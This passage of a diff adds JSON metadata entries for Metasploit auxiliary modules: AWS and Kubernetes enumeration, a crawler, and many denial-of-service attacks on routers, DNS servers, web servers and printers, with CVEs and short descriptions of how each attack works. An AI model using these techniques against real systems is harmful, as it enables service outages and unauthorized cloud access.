credentials associated\n with the account", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-06 22:49:03 +0000", + "path": "/modules/auxiliary/cloud/aws/enum_iam.rb", + "is_install_path": true, + "ref_name": "cloud/aws/enum_iam", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_cloud/aws/enum_s3": { + "name": "Amazon Web Services S3 instance enumeration", + "fullname": "auxiliary/cloud/aws/enum_s3", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Aaron Soto " + ], + "description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all S3 buckets associated\n with the account", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-06 22:49:03 +0000", + "path": "/modules/auxiliary/cloud/aws/enum_s3.rb", + "is_install_path": true, + "ref_name": "cloud/aws/enum_s3", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_cloud/aws/enum_ssm": { + "name": "Amazon Web Services EC2 SSM enumeration", + "fullname": "auxiliary/cloud/aws/enum_ssm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "RageLtMan " + ], + "description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all SSM-enabled EC2 instances\n 
accessible to the account. Once enumerated as SSM-enabled, the\n instances can be controlled using out-of-band WebSocket sessions\n provided by the AWS API (nominally, privileged out of the box).\n This module provides not only the API enumeration identifying EC2\n instances accessible via SSM with given credentials, but enables\n session initiation for all identified targets (without requiring\n target-level credentials) using the CreateSession datastore option.\n The module also provides an EC2 ID filter and a limiting throttle\n to prevent session stampedes or expensive messes.", + "references": [ + "URL-https://www.sempervictus.com/single-post/once-upon-a-cloudy-air-i-crossed-a-gap-which-wasn-t-there" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-06-03 11:02:15 +0000", + "path": "/modules/auxiliary/cloud/aws/enum_ssm.rb", + "is_install_path": true, + "ref_name": "cloud/aws/enum_ssm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [], + "Stability": [ + "crash-safe" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_cloud/kubernetes/enum_kubernetes": { + "name": "Kubernetes Enumeration", + "fullname": "auxiliary/cloud/kubernetes/enum_kubernetes", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "alanfoster", + "Spencer McIntyre" + ], + "description": "Enumerate a Kubernetes API to report useful resources such as available namespaces,\n pods, secrets, etc.\n\n Useful resources will be highlighted using the HIGHLIGHT_NAME_PATTERN option.", + "references": [], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": 
null, + "mod_time": "2021-10-07 12:35:53 +0000", + "path": "/modules/auxiliary/cloud/kubernetes/enum_kubernetes.rb", + "is_install_path": true, + "ref_name": "cloud/kubernetes/enum_kubernetes", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [], + "Stability": [ + "crash-safe" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": false, + "actions": [ + { + "name": "all", + "description": "enumerate all resources" + }, + { + "name": "auth", + "description": "enumerate auth" + }, + { + "name": "namespace", + "description": "enumerate namespace" + }, + { + "name": "namespaces", + "description": "enumerate namespaces" + }, + { + "name": "pod", + "description": "enumerate pod" + }, + { + "name": "pods", + "description": "enumerate pods" + }, + { + "name": "secret", + "description": "enumerate secret" + }, + { + "name": "secrets", + "description": "enumerate secrets" + }, + { + "name": "version", + "description": "enumerate version" + } + ] + }, + "auxiliary_crawler/msfcrawler": { + "name": "Metasploit Web Crawler", + "fullname": "auxiliary/crawler/msfcrawler", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "et " + ], + "description": "This auxiliary module is a modular web crawler, to be used in conjunction with wmap (someday) or standalone.", + "references": [], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-04-02 15:48:42 +0000", + "path": "/modules/auxiliary/crawler/msfcrawler.rb", + "is_install_path": true, + "ref_name": "crawler/msfcrawler", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/android/android_stock_browser_iframe": { + "name": "Android Stock Browser Iframe DOS", + "fullname": 
"auxiliary/dos/android/android_stock_browser_iframe", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-12-01", + "type": "auxiliary", + "author": [ + "Jean Pascal Pereira", + "Jonathan Waggoner" + ], + "description": "This module exploits a vulnerability in the native browser that comes with Android 4.0.3.\n If successful, the browser will crash after viewing the webpage.", + "references": [ + "PACKETSTORM-118539", + "CVE-2012-6301" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/android/android_stock_browser_iframe.rb", + "is_install_path": true, + "ref_name": "dos/android/android_stock_browser_iframe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "WebServer", + "description": "Serve exploit via web server" + } + ] + }, + "auxiliary_dos/apple_ios/webkit_backdrop_filter_blur": { + "name": "iOS Safari Denial of Service with CSS", + "fullname": "auxiliary/dos/apple_ios/webkit_backdrop_filter_blur", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-09-15", + "type": "auxiliary", + "author": [ + "Sabri Haddouche" + ], + "description": "This module exploits a vulnerability in WebKit on Apple iOS.\n If successful, the device will restart after viewing the webpage.", + "references": [ + "URL-https://twitter.com/pwnsdx/status/1040944750973595649", + "URL-http://web.archive.org/web/20220706175501/https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea", + "URL-https://nbulischeck.github.io/apple-safari-crash" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb", + "is_install_path": 
true, + "ref_name": "dos/apple_ios/webkit_backdrop_filter_blur", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/cisco/cisco_7937g_dos": { + "name": "Cisco 7937G Denial-of-Service Attack", + "fullname": "auxiliary/dos/cisco/cisco_7937g_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-06-02", + "type": "auxiliary", + "author": [ + "Cody Martin" + ], + "description": "This module exploits a bug in how the conference station \n\thandles incoming SSH connections that provide an incompatible \n\tkey exchange. By connecting with an incompatible key exchange, \n\tthe device becomes nonresponsive until it is manually power\n\tcycled.", + "references": [ + "URL-https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/", + "CVE-2020-16138" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-08-21 13:13:33 +0000", + "path": "/modules/auxiliary/dos/cisco/cisco_7937g_dos.py", + "is_install_path": true, + "ref_name": "dos/cisco/cisco_7937g_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/cisco/cisco_7937g_dos_reboot": { + "name": "Cisco 7937G Denial-of-Service Reboot Attack", + "fullname": "auxiliary/dos/cisco/cisco_7937g_dos_reboot", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-06-02", + "type": "auxiliary", + "author": [ + "Cody Martin" + ], + "description": "This module exploits a bug in how the conference station handles \n\texecuting a ping via its web interface. 
By repeatedly executing \n\tthe ping function without clearing out the resulting output, \n\ta DoS is caused that will reset the device after a few minutes.", + "references": [ + "URL-https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/", + "CVE-2020-16139" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-08-21 09:01:45 +0000", + "path": "/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.py", + "is_install_path": true, + "ref_name": "dos/cisco/cisco_7937g_dos_reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/cisco/ios_http_percentpercent": { + "name": "Cisco IOS HTTP GET /%% Request Denial of Service", + "fullname": "auxiliary/dos/cisco/ios_http_percentpercent", + "aliases": [], + "rank": 300, + "disclosure_date": "2000-04-26", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module triggers a Denial of Service condition in the Cisco IOS\n HTTP server. By sending a GET request for \"/%%\", the device becomes\n unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. 
This module\n tested successfully against a Cisco 1600 Router IOS v11.2(18)P.", + "references": [ + "BID-1154", + "CVE-2000-0380", + "OSVDB-1302" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb", + "is_install_path": true, + "ref_name": "dos/cisco/ios_http_percentpercent", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/cisco/ios_telnet_rocem": { + "name": "Cisco IOS Telnet Denial of Service", + "fullname": "auxiliary/dos/cisco/ios_telnet_rocem", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-03-17", + "type": "auxiliary", + "author": [ + "Artem Kondratenko" + ], + "description": "This module triggers a Denial of Service condition in the Cisco IOS\n telnet service affecting multiple Cisco switches. 
Tested against Cisco\n Catalyst 2960 and 3750.", + "references": [ + "BID-96960", + "CVE-2017-3881", + "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp", + "URL-https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution" + ], + "platform": "", + "arch": "", + "rport": 23, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/cisco/ios_telnet_rocem.rb", + "is_install_path": true, + "ref_name": "dos/cisco/ios_telnet_rocem", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/dhcp/isc_dhcpd_clientid": { + "name": "ISC DHCP Zero Length ClientID Denial of Service Module", + "fullname": "auxiliary/dos/dhcp/isc_dhcpd_clientid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "sid", + "theLightCosine " + ], + "description": "This module performs a Denial of Service Attack against the ISC DHCP server,\n versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request\n message with a 0-length client_id option for an IP address on the appropriate range\n for the dhcp server. 
When ISC DHCP Server tries to hash this value it exits\n abnormally.", + "references": [ + "CVE-2010-2156", + "OSVDB-65246", + "EDB-14185" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2019-03-05 03:38:51 +0000", + "path": "/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb", + "is_install_path": true, + "ref_name": "dos/dhcp/isc_dhcpd_clientid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/dns/bind_tkey": { + "name": "BIND TKEY Query Denial of Service", + "fullname": "auxiliary/dos/dns/bind_tkey", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-07-28", + "type": "auxiliary", + "author": [ + "Jonathan Foote", + "throwawayokejxqbbif", + "wvu " + ], + "description": "This module sends a malformed TKEY query, which exploits an\n error in handling TKEY queries on affected BIND9 'named' DNS servers.\n As a result, a vulnerable named server will exit with a REQUIRE\n assertion failure. 
This condition can be exploited in versions of BIND\n between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0\n through 9.10.2-P2.", + "references": [ + "CVE-2015-5477", + "URL-http://web.archive.org/web/20190425014550/https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/", + "URL-https://kb.isc.org/article/AA-01272" + ], + "platform": "", + "arch": "", + "rport": 53, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/dos/dns/bind_tkey.rb", + "is_install_path": true, + "ref_name": "dos/dns/bind_tkey", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/dns/bind_tsig": { + "name": "BIND TSIG Query Denial of Service", + "fullname": "auxiliary/dos/dns/bind_tsig", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-09-27", + "type": "auxiliary", + "author": [ + "Martin Rocha", + "Ezequiel Tavella", + "Alejandro Parodi", + "Infobyte Research Team" + ], + "description": "A defect in the rendering of messages into packets can cause named to\n exit with an assertion failure in buffer.c while constructing a response\n to a query that meets certain criteria.\n\n This assertion can be triggered even if the apparent source address\n isn't allowed to make queries.", + "references": [ + "CVE-2016-2776", + "URL-http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html" + ], + "platform": "", + "arch": "", + "rport": 53, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/dns/bind_tsig.rb", + "is_install_path": true, + "ref_name": "dos/dns/bind_tsig", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": 
false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/dns/bind_tsig_badtime": { + "name": "BIND TSIG Badtime Query Denial of Service", + "fullname": "auxiliary/dos/dns/bind_tsig_badtime", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-05-19", + "type": "auxiliary", + "author": [ + "Tobias Klein", + "Shuto Imai" + ], + "description": "A logic error in code which checks TSIG validity can be used to\n trigger an assertion failure in tsig.c.", + "references": [ + "CVE-2020-8617", + "URL-https://gitlab.isc.org/isc-projects/bind9/-/issues/1703", + "URL-https://www.trapkit.de/advisories/TKADV2020-002.txt" + ], + "platform": "", + "arch": "", + "rport": 53, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/auxiliary/dos/dns/bind_tsig_badtime.rb", + "is_install_path": true, + "ref_name": "dos/dns/bind_tsig_badtime", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/freebsd/nfsd/nfsd_mount": { + "name": "FreeBSD Remote NFS RPC Request Denial of Service", + "fullname": "auxiliary/dos/freebsd/nfsd/nfsd_mount", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module sends a specially-crafted NFS Mount request causing a\n kernel panic on host running FreeBSD 6.0.", + "references": [ + "BID-16838", + "OSVDB-23511", + "CVE-2006-0900" + ], + "platform": "", + "arch": "", + "rport": 2049, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb", + "is_install_path": true, + "ref_name": "dos/freebsd/nfsd/nfsd_mount", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/ftp/vsftpd_232": { + "name": "VSFTPD 2.3.2 Denial of Service", + "fullname": "auxiliary/dos/ftp/vsftpd_232", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-02-03", + "type": "auxiliary", + "author": [ + "Nick Cottrell (Rad10Logic) ", + "Anna Graterol ", + "Mana Mostaani ", + "Maksymilian Arciemowicz" + ], + "description": "This module triggers a Denial of Service condition in the VSFTPD server in\n versions before 2.3.3. So far, it has been tested on 2.3.0, 2.3.1, and 2.3.2.", + "references": [ + "BID-46617", + "CVE-2011-0762", + "EDB-16270" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": null, + "mod_time": "2023-05-25 21:21:49 +0000", + "path": "/modules/auxiliary/dos/ftp/vsftpd_232.rb", + "is_install_path": true, + "ref_name": "dos/ftp/vsftpd_232", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/hp/data_protector_rds": { + "name": "HP Data Protector Manager RDS DOS", + "fullname": "auxiliary/dos/hp/data_protector_rds", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-01-08", + "type": "auxiliary", + "author": [ + "Roi Mallo ", + "sinn3r " + ], + "description": "This module causes a remote DOS on HP Data Protector's RDS service. 
By sending\n a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous\n size for malloc().", + "references": [ + "CVE-2011-0514", + "OSVDB-70617", + "EDB-15940" + ], + "platform": "", + "arch": "", + "rport": 1530, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/hp/data_protector_rds.rb", + "is_install_path": true, + "ref_name": "dos/hp/data_protector_rds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/3com_superstack_switch": { + "name": "3Com SuperStack Switch Denial of Service", + "fullname": "auxiliary/dos/http/3com_superstack_switch", + "aliases": [], + "rank": 300, + "disclosure_date": "2004-06-24", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module causes a temporary denial of service condition\n against 3Com SuperStack switches. By sending excessive data\n to the HTTP Management interface, the switch stops responding\n temporarily. The device does not reset. Tested successfully\n against a 3300SM firmware v2.66. 
Reported to affect versions\n prior to v2.72.", + "references": [ + "OSVDB-7246", + "CVE-2004-2691", + "URL-http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/3com_superstack_switch.rb", + "is_install_path": true, + "ref_name": "dos/http/3com_superstack_switch", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/apache_commons_fileupload_dos": { + "name": "Apache Commons FileUpload and Apache Tomcat DoS", + "fullname": "auxiliary/dos/http/apache_commons_fileupload_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-02-06", + "type": "auxiliary", + "author": [ + "Unknown", + "ribeirux" + ], + "description": "This module triggers an infinite loop in Apache Commons FileUpload 1.0\n through 1.3 via a specially crafted Content-Type header.\n Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle\n mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50\n and 8.0.0-RC1 through 8.0.1 are affected by this issue. 
Tomcat 6 also\n uses Commons FileUpload as part of the Manager application.", + "references": [ + "CVE-2014-0050", + "URL-https://tomcat.apache.org/security-8.html", + "URL-https://tomcat.apache.org/security-7.html" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/apache_commons_fileupload_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/apache_mod_isapi": { + "name": "Apache mod_isapi Dangling Pointer", + "fullname": "auxiliary/dos/http/apache_mod_isapi", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-03-05", + "type": "auxiliary", + "author": [ + "Brett Gervasoni", + "jduck " + ], + "description": "This module triggers a use-after-free vulnerability in the Apache\n Software Foundation mod_isapi extension for versions 2.2.14 and earlier.\n In order to reach the vulnerable code, the target server must have an\n ISAPI module installed and configured.\n\n By making a request that terminates abnormally (either an aborted TCP\n connection or an unsatisfied chunked request), mod_isapi will unload the\n ISAPI extension. Later, if another request comes for that ISAPI module,\n previously obtained pointers will be used resulting in an access\n violation or potentially arbitrary code execution.\n\n Although arbitrary code execution is theoretically possible, a\n real-world method of invoking this consequence has not been proven. 
In\n order to do so, one would need to find a situation where a particular\n ISAPI module loads at an image base address that can be re-allocated by\n a remote attacker.\n\n Limited success was encountered using two separate ISAPI modules. In\n this scenario, a second ISAPI module was loaded into the same memory\n area as the previously unloaded module.", + "references": [ + "CVE-2010-0425", + "OSVDB-62674", + "BID-38494", + "URL-https://bz.apache.org/bugzilla/show_bug.cgi?id=48509", + "URL-https://web.archive.org/web/20100715032229/http://www.gossamer-threads.com/lists/apache/cvs/381537", + "URL-http://www.senseofsecurity.com.au/advisories/SOS-10-002", + "EDB-11650" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/http/apache_mod_isapi.rb", + "is_install_path": true, + "ref_name": "dos/http/apache_mod_isapi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/apache_range_dos": { + "name": "Apache Range Header DoS (Apache Killer)", + "fullname": "auxiliary/dos/http/apache_range_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-08-19", + "type": "auxiliary", + "author": [ + "Kingcope", + "Masashi Fujiwara", + "Markus Neis " + ], + "description": "The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x\n through 2.2.19 allows remote attackers to cause a denial of service (memory and\n CPU consumption) via a Range header that expresses multiple overlapping ranges,\n exploit called \"Apache Killer\"", + "references": [ + "BID-49303", + "CVE-2011-3192", + "EDB-17696", + "OSVDB-74721" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + 
"autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/apache_range_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/apache_range_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "CHECK", + "description": "Check if target is vulnerable" + }, + { + "name": "DOS", + "description": "Trigger Denial of Service against target" + } + ] + }, + "auxiliary_dos/http/apache_tomcat_transfer_encoding": { + "name": "Apache Tomcat Transfer-Encoding Information Disclosure and DoS", + "fullname": "auxiliary/dos/http/apache_tomcat_transfer_encoding", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-07-09", + "type": "auxiliary", + "author": [ + "Steve Jones", + "Hoagie ", + "Paulino Calderon " + ], + "description": "Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not\n properly handle an invalid Transfer-Encoding header, which allows remote attackers\n to cause a denial of service (application outage) or obtain sensitive information\n via a crafted header that interferes with \"recycling of a buffer.\"", + "references": [ + "CVE-2010-2227", + "OSVDB-66319", + "BID-41544" + ], + "platform": "", + "arch": "", + "rport": 8000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb", + "is_install_path": true, + "ref_name": "dos/http/apache_tomcat_transfer_encoding", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/brother_debut_dos": { + "name": "Brother Debut http Denial Of Service", + "fullname": "auxiliary/dos/http/brother_debut_dos", + "aliases": [], + 
"rank": 300, + "disclosure_date": "2017-11-02", + "type": "auxiliary", + "author": [ + "z00n <0xz00n@gmail.com>", + "h00die" + ], + "description": "The Debut embedded HTTP server <= 1.20 on Brother printers allows for a Denial\n of Service (DoS) condition via a crafted HTTP request. The printer will be\n unresponsive from HTTP and printing requests for ~300 seconds. After which, the\n printer will start responding again.", + "references": [ + "CVE-2017-16249", + "URL-https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18730" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/http/brother_debut_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/brother_debut_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/cable_haunt_websocket_dos": { + "name": "\"Cablehaunt\" Cable Modem WebSocket DoS", + "fullname": "auxiliary/dos/http/cable_haunt_websocket_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-01-07", + "type": "auxiliary", + "author": [ + "Alexander Dalsgaard Krog (Lyrebirds)", + "Jens Hegner Stærmose (Lyrebirds)", + "Kasper Kohsel Terndrup (Lyrebirds)", + "Simon Vandel Sillesen (Independent)", + "Nicholas Starke" + ], + "description": "There exists a buffer overflow vulnerability in certain\n Cable Modem Spectrum Analyzer interfaces. 
This overflow\n is exploitable, but since an exploit would differ between\n every make, model, and firmware version (which also\n differs from ISP to ISP), this module simply causes a\n Denial of Service to test if the vulnerability is present.", + "references": [ + "CVE-2019-19494", + "EDB-47936", + "URL-https://cablehaunt.com/", + "URL-https://github.com/Lyrebirds/sagemcom-fast-3890-exploit" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/auxiliary/dos/http/cable_haunt_websocket_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/cable_haunt_websocket_dos", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/canon_wireless_printer": { + "name": "Canon Wireless Printer Denial Of Service", + "fullname": "auxiliary/dos/http/canon_wireless_printer", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-06-18", + "type": "auxiliary", + "author": [ + "Matt \"hostess\" Andreko " + ], + "description": "The HTTP management interface on several models of Canon Wireless printers\n allows for a Denial of Service (DoS) condition via a crafted HTTP request. 
Note:\n if this module is successful, the device can only be recovered with a physical\n power cycle.", + "references": [ + "CVE-2013-4615", + "URL-https://www.mattandreko.com/2013/06/canon-y-u-no-security.html" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/http/canon_wireless_printer.rb", + "is_install_path": true, + "ref_name": "dos/http/canon_wireless_printer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/dell_openmanage_post": { + "name": "Dell OpenManage POST Request Heap Overflow (win32)", + "fullname": "auxiliary/dos/http/dell_openmanage_post", + "aliases": [], + "rank": 300, + "disclosure_date": "2004-02-26", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module exploits a heap overflow in the Dell OpenManage\n Web Server (omws32.exe), versions 3.2-3.7.1. 
